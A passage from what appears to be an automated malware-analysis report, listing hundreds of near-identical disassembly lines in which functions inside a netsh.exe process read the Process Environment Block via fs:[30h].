          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03895BA5 mov eax, dword ptr fs:[00000030h]12_2_03895BA5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037CDB40 mov eax, dword ptr fs:[00000030h]12_2_037CDB40
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038453CA mov eax, dword ptr fs:[00000030h]12_2_038453CA
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038453CA mov eax, dword ptr fs:[00000030h]12_2_038453CA
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0388131B mov eax, dword ptr fs:[00000030h]12_2_0388131B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037EDBE9 mov eax, dword ptr fs:[00000030h]12_2_037EDBE9
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F03E2 mov eax, dword ptr fs:[00000030h]12_2_037F03E2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F03E2 mov eax, dword ptr fs:[00000030h]12_2_037F03E2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F03E2 mov eax, dword ptr fs:[00000030h]12_2_037F03E2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F03E2 mov eax, dword ptr fs:[00000030h]12_2_037F03E2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F03E2 mov eax, dword ptr fs:[00000030h]12_2_037F03E2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F03E2 mov eax, dword ptr fs:[00000030h]12_2_037F03E2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03898B58 mov eax, dword ptr fs:[00000030h]12_2_03898B58
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F4BAD mov eax, dword ptr fs:[00000030h]12_2_037F4BAD
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F4BAD mov eax, dword ptr fs:[00000030h]12_2_037F4BAD
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F4BAD mov eax, dword ptr fs:[00000030h]12_2_037F4BAD
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F2397 mov eax, dword ptr fs:[00000030h]12_2_037F2397
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037FB390 mov eax, dword ptr fs:[00000030h]12_2_037FB390
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037D1B8F mov eax, dword ptr fs:[00000030h]12_2_037D1B8F
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037D1B8F mov eax, dword ptr fs:[00000030h]12_2_037D1B8F
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C9240 mov eax, dword ptr fs:[00000030h]12_2_037C9240
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C9240 mov eax, dword ptr fs:[00000030h]12_2_037C9240
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C9240 mov eax, dword ptr fs:[00000030h]12_2_037C9240
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C9240 mov eax, dword ptr fs:[00000030h]12_2_037C9240
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037E3A1C mov eax, dword ptr fs:[00000030h]12_2_037E3A1C
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037CAA16 mov eax, dword ptr fs:[00000030h]12_2_037CAA16
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037CAA16 mov eax, dword ptr fs:[00000030h]12_2_037CAA16
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C5210 mov eax, dword ptr fs:[00000030h]12_2_037C5210
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C5210 mov ecx, dword ptr fs:[00000030h]12_2_037C5210
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C5210 mov eax, dword ptr fs:[00000030h]12_2_037C5210
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C5210 mov eax, dword ptr fs:[00000030h]12_2_037C5210
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037D8A0A mov eax, dword ptr fs:[00000030h]12_2_037D8A0A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F2AE4 mov eax, dword ptr fs:[00000030h]12_2_037F2AE4
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0388AA16 mov eax, dword ptr fs:[00000030h]12_2_0388AA16
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0388AA16 mov eax, dword ptr fs:[00000030h]12_2_0388AA16
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03804A2C mov eax, dword ptr fs:[00000030h]12_2_03804A2C
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03804A2C mov eax, dword ptr fs:[00000030h]12_2_03804A2C
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F2ACB mov eax, dword ptr fs:[00000030h]12_2_037F2ACB
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037DAAB0 mov eax, dword ptr fs:[00000030h]12_2_037DAAB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037DAAB0 mov eax, dword ptr fs:[00000030h]12_2_037DAAB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037FFAB0 mov eax, dword ptr fs:[00000030h]12_2_037FFAB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03854257 mov eax, dword ptr fs:[00000030h]12_2_03854257
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C52A5 mov eax, dword ptr fs:[00000030h]12_2_037C52A5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C52A5 mov eax, dword ptr fs:[00000030h]12_2_037C52A5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C52A5 mov eax, dword ptr fs:[00000030h]12_2_037C52A5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C52A5 mov eax, dword ptr fs:[00000030h]12_2_037C52A5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C52A5 mov eax, dword ptr fs:[00000030h]12_2_037C52A5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0388EA55 mov eax, dword ptr fs:[00000030h]12_2_0388EA55
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0387B260 mov eax, dword ptr fs:[00000030h]12_2_0387B260
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0387B260 mov eax, dword ptr fs:[00000030h]12_2_0387B260
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037FD294 mov eax, dword ptr fs:[00000030h]12_2_037FD294
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037FD294 mov eax, dword ptr fs:[00000030h]12_2_037FD294
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03898A62 mov eax, dword ptr fs:[00000030h]12_2_03898A62
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0380927A mov eax, dword ptr fs:[00000030h]12_2_0380927A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037CB171 mov eax, dword ptr fs:[00000030h]12_2_037CB171
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037CB171 mov eax, dword ptr fs:[00000030h]12_2_037CB171
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037CC962 mov eax, dword ptr fs:[00000030h]12_2_037CC962
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038469A6 mov eax, dword ptr fs:[00000030h]12_2_038469A6
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037EB944 mov eax, dword ptr fs:[00000030h]12_2_037EB944
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037EB944 mov eax, dword ptr fs:[00000030h]12_2_037EB944
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038451BE mov eax, dword ptr fs:[00000030h]12_2_038451BE
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038451BE mov eax, dword ptr fs:[00000030h]12_2_038451BE
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038451BE mov eax, dword ptr fs:[00000030h]12_2_038451BE
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038451BE mov eax, dword ptr fs:[00000030h]12_2_038451BE
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F513A mov eax, dword ptr fs:[00000030h]12_2_037F513A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F513A mov eax, dword ptr fs:[00000030h]12_2_037F513A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037E4120 mov eax, dword ptr fs:[00000030h]12_2_037E4120
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037E4120 mov eax, dword ptr fs:[00000030h]12_2_037E4120
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037E4120 mov eax, dword ptr fs:[00000030h]12_2_037E4120
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037E4120 mov eax, dword ptr fs:[00000030h]12_2_037E4120
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037E4120 mov ecx, dword ptr fs:[00000030h]12_2_037E4120
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038541E8 mov eax, dword ptr fs:[00000030h]12_2_038541E8
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C9100 mov eax, dword ptr fs:[00000030h]12_2_037C9100
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C9100 mov eax, dword ptr fs:[00000030h]12_2_037C9100
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C9100 mov eax, dword ptr fs:[00000030h]12_2_037C9100
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037CB1E1 mov eax, dword ptr fs:[00000030h]12_2_037CB1E1
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037CB1E1 mov eax, dword ptr fs:[00000030h]12_2_037CB1E1
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037CB1E1 mov eax, dword ptr fs:[00000030h]12_2_037CB1E1
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F61A0 mov eax, dword ptr fs:[00000030h]12_2_037F61A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F61A0 mov eax, dword ptr fs:[00000030h]12_2_037F61A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F2990 mov eax, dword ptr fs:[00000030h]12_2_037F2990
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037FA185 mov eax, dword ptr fs:[00000030h]12_2_037FA185
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037EC182 mov eax, dword ptr fs:[00000030h]12_2_037EC182
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03843884 mov eax, dword ptr fs:[00000030h]12_2_03843884
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03843884 mov eax, dword ptr fs:[00000030h]12_2_03843884
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037E0050 mov eax, dword ptr fs:[00000030h]12_2_037E0050
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037E0050 mov eax, dword ptr fs:[00000030h]12_2_037E0050
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038090AF mov eax, dword ptr fs:[00000030h]12_2_038090AF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F002D mov eax, dword ptr fs:[00000030h]12_2_037F002D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F002D mov eax, dword ptr fs:[00000030h]12_2_037F002D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F002D mov eax, dword ptr fs:[00000030h]12_2_037F002D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F002D mov eax, dword ptr fs:[00000030h]12_2_037F002D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F002D mov eax, dword ptr fs:[00000030h]12_2_037F002D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0385B8D0 mov eax, dword ptr fs:[00000030h]12_2_0385B8D0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0385B8D0 mov ecx, dword ptr fs:[00000030h]12_2_0385B8D0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0385B8D0 mov eax, dword ptr fs:[00000030h]12_2_0385B8D0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0385B8D0 mov eax, dword ptr fs:[00000030h]12_2_0385B8D0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0385B8D0 mov eax, dword ptr fs:[00000030h]12_2_0385B8D0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0385B8D0 mov eax, dword ptr fs:[00000030h]12_2_0385B8D0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037DB02A mov eax, dword ptr fs:[00000030h]12_2_037DB02A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037DB02A mov eax, dword ptr fs:[00000030h]12_2_037DB02A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037DB02A mov eax, dword ptr fs:[00000030h]12_2_037DB02A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037DB02A mov eax, dword ptr fs:[00000030h]12_2_037DB02A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C58EC mov eax, dword ptr fs:[00000030h]12_2_037C58EC
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03847016 mov eax, dword ptr fs:[00000030h]12_2_03847016
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03847016 mov eax, dword ptr fs:[00000030h]12_2_03847016
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03847016 mov eax, dword ptr fs:[00000030h]12_2_03847016
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03894015 mov eax, dword ptr fs:[00000030h]12_2_03894015
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03894015 mov eax, dword ptr fs:[00000030h]12_2_03894015
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037FF0BF mov ecx, dword ptr fs:[00000030h]12_2_037FF0BF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037FF0BF mov eax, dword ptr fs:[00000030h]12_2_037FF0BF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037FF0BF mov eax, dword ptr fs:[00000030h]12_2_037FF0BF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F20A0 mov eax, dword ptr fs:[00000030h]12_2_037F20A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F20A0 mov eax, dword ptr fs:[00000030h]12_2_037F20A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F20A0 mov eax, dword ptr fs:[00000030h]12_2_037F20A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F20A0 mov eax, dword ptr fs:[00000030h]12_2_037F20A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F20A0 mov eax, dword ptr fs:[00000030h]12_2_037F20A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F20A0 mov eax, dword ptr fs:[00000030h]12_2_037F20A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03882073 mov eax, dword ptr fs:[00000030h]12_2_03882073
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C9080 mov eax, dword ptr fs:[00000030h]12_2_037C9080
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03891074 mov eax, dword ptr fs:[00000030h]12_2_03891074
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03847794 mov eax, dword ptr fs:[00000030h]12_2_03847794
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03847794 mov eax, dword ptr fs:[00000030h]12_2_03847794
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03847794 mov eax, dword ptr fs:[00000030h]12_2_03847794
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037DFF60 mov eax, dword ptr fs:[00000030h]12_2_037DFF60
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037DEF40 mov eax, dword ptr fs:[00000030h]12_2_037DEF40
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037FE730 mov eax, dword ptr fs:[00000030h]12_2_037FE730
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C4F2E mov eax, dword ptr fs:[00000030h]12_2_037C4F2E
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C4F2E mov eax, dword ptr fs:[00000030h]12_2_037C4F2E
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037EF716 mov eax, dword ptr fs:[00000030h]12_2_037EF716
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037FA70E mov eax, dword ptr fs:[00000030h]12_2_037FA70E
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037FA70E mov eax, dword ptr fs:[00000030h]12_2_037FA70E
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038037F5 mov eax, dword ptr fs:[00000030h]12_2_038037F5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0389070D mov eax, dword ptr fs:[00000030h]12_2_0389070D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0389070D mov eax, dword ptr fs:[00000030h]12_2_0389070D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0385FF10 mov eax, dword ptr fs:[00000030h]12_2_0385FF10
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0385FF10 mov eax, dword ptr fs:[00000030h]12_2_0385FF10
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03898F6A mov eax, dword ptr fs:[00000030h]12_2_03898F6A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037D8794 mov eax, dword ptr fs:[00000030h]12_2_037D8794
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0385FE87 mov eax, dword ptr fs:[00000030h]12_2_0385FE87
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037EAE73 mov eax, dword ptr fs:[00000030h]12_2_037EAE73
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037EAE73 mov eax, dword ptr fs:[00000030h]12_2_037EAE73
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037EAE73 mov eax, dword ptr fs:[00000030h]12_2_037EAE73
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037EAE73 mov eax, dword ptr fs:[00000030h]12_2_037EAE73
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037EAE73 mov eax, dword ptr fs:[00000030h]12_2_037EAE73
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037D766D mov eax, dword ptr fs:[00000030h]12_2_037D766D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038446A7 mov eax, dword ptr fs:[00000030h]12_2_038446A7
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03890EA5 mov eax, dword ptr fs:[00000030h]12_2_03890EA5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03890EA5 mov eax, dword ptr fs:[00000030h]12_2_03890EA5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03890EA5 mov eax, dword ptr fs:[00000030h]12_2_03890EA5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037D7E41 mov eax, dword ptr fs:[00000030h]12_2_037D7E41
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037D7E41 mov eax, dword ptr fs:[00000030h]12_2_037D7E41
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037D7E41 mov eax, dword ptr fs:[00000030h]12_2_037D7E41
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037D7E41 mov eax, dword ptr fs:[00000030h]12_2_037D7E41
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037D7E41 mov eax, dword ptr fs:[00000030h]12_2_037D7E41
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037D7E41 mov eax, dword ptr fs:[00000030h]12_2_037D7E41
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03808EC7 mov eax, dword ptr fs:[00000030h]12_2_03808EC7
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0387FEC0 mov eax, dword ptr fs:[00000030h]12_2_0387FEC0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037CE620 mov eax, dword ptr fs:[00000030h]12_2_037CE620
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03898ED6 mov eax, dword ptr fs:[00000030h]12_2_03898ED6
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037FA61C mov eax, dword ptr fs:[00000030h]12_2_037FA61C
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037FA61C mov eax, dword ptr fs:[00000030h]12_2_037FA61C
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037CC600 mov eax, dword ptr fs:[00000030h]12_2_037CC600
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037CC600 mov eax, dword ptr fs:[00000030h]12_2_037CC600
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037CC600 mov eax, dword ptr fs:[00000030h]12_2_037CC600
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F8E00 mov eax, dword ptr fs:[00000030h]12_2_037F8E00
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03881608 mov eax, dword ptr fs:[00000030h]12_2_03881608
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F16E0 mov ecx, dword ptr fs:[00000030h]12_2_037F16E0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037D76E2 mov eax, dword ptr fs:[00000030h]12_2_037D76E2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F36CC mov eax, dword ptr fs:[00000030h]12_2_037F36CC
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0387FE3F mov eax, dword ptr fs:[00000030h]12_2_0387FE3F
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0388AE44 mov eax, dword ptr fs:[00000030h]12_2_0388AE44
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0388AE44 mov eax, dword ptr fs:[00000030h]12_2_0388AE44
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037EC577 mov eax, dword ptr fs:[00000030h]12_2_037EC577
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037EC577 mov eax, dword ptr fs:[00000030h]12_2_037EC577
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038905AC mov eax, dword ptr fs:[00000030h]12_2_038905AC
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038905AC mov eax, dword ptr fs:[00000030h]12_2_038905AC
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037E7D50 mov eax, dword ptr fs:[00000030h]12_2_037E7D50
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F4D3B mov eax, dword ptr fs:[00000030h]12_2_037F4D3B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F4D3B mov eax, dword ptr fs:[00000030h]12_2_037F4D3B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F4D3B mov eax, dword ptr fs:[00000030h]12_2_037F4D3B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037D3D34 mov eax, dword ptr fs:[00000030h]12_2_037D3D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037D3D34 mov eax, dword ptr fs:[00000030h]12_2_037D3D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037D3D34 mov eax, dword ptr fs:[00000030h]12_2_037D3D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037D3D34 mov eax, dword ptr fs:[00000030h]12_2_037D3D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037D3D34 mov eax, dword ptr fs:[00000030h]12_2_037D3D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037D3D34 mov eax, dword ptr fs:[00000030h]12_2_037D3D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037D3D34 mov eax, dword ptr fs:[00000030h]12_2_037D3D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037D3D34 mov eax, dword ptr fs:[00000030h]12_2_037D3D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037D3D34 mov eax, dword ptr fs:[00000030h]12_2_037D3D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037D3D34 mov eax, dword ptr fs:[00000030h]12_2_037D3D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037D3D34 mov eax, dword ptr fs:[00000030h]12_2_037D3D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037D3D34 mov eax, dword ptr fs:[00000030h]12_2_037D3D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037D3D34 mov eax, dword ptr fs:[00000030h]12_2_037D3D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037CAD30 mov eax, dword ptr fs:[00000030h]12_2_037CAD30
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03846DC9 mov eax, dword ptr fs:[00000030h]12_2_03846DC9
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03846DC9 mov eax, dword ptr fs:[00000030h]12_2_03846DC9
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03846DC9 mov eax, dword ptr fs:[00000030h]12_2_03846DC9
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03846DC9 mov ecx, dword ptr fs:[00000030h]12_2_03846DC9
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03846DC9 mov eax, dword ptr fs:[00000030h]12_2_03846DC9
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03846DC9 mov eax, dword ptr fs:[00000030h]12_2_03846DC9
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0388FDE2 mov eax, dword ptr fs:[00000030h]12_2_0388FDE2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0388FDE2 mov eax, dword ptr fs:[00000030h]12_2_0388FDE2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0388FDE2 mov eax, dword ptr fs:[00000030h]12_2_0388FDE2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0388FDE2 mov eax, dword ptr fs:[00000030h]12_2_0388FDE2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03878DF1 mov eax, dword ptr fs:[00000030h]12_2_03878DF1
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037DD5E0 mov eax, dword ptr fs:[00000030h]12_2_037DD5E0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037DD5E0 mov eax, dword ptr fs:[00000030h]12_2_037DD5E0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0388E539 mov eax, dword ptr fs:[00000030h]12_2_0388E539
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0384A537 mov eax, dword ptr fs:[00000030h]12_2_0384A537
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03898D34 mov eax, dword ptr fs:[00000030h]12_2_03898D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03803D43 mov eax, dword ptr fs:[00000030h]12_2_03803D43
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03843540 mov eax, dword ptr fs:[00000030h]12_2_03843540
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F1DB5 mov eax, dword ptr fs:[00000030h]12_2_037F1DB5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F1DB5 mov eax, dword ptr fs:[00000030h]12_2_037F1DB5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F1DB5 mov eax, dword ptr fs:[00000030h]12_2_037F1DB5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F35A1 mov eax, dword ptr fs:[00000030h]12_2_037F35A1
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037FFD9B mov eax, dword ptr fs:[00000030h]12_2_037FFD9B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037FFD9B mov eax, dword ptr fs:[00000030h]12_2_037FFD9B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C2D8A mov eax, dword ptr fs:[00000030h]12_2_037C2D8A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C2D8A mov eax, dword ptr fs:[00000030h]12_2_037C2D8A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C2D8A mov eax, dword ptr fs:[00000030h]12_2_037C2D8A
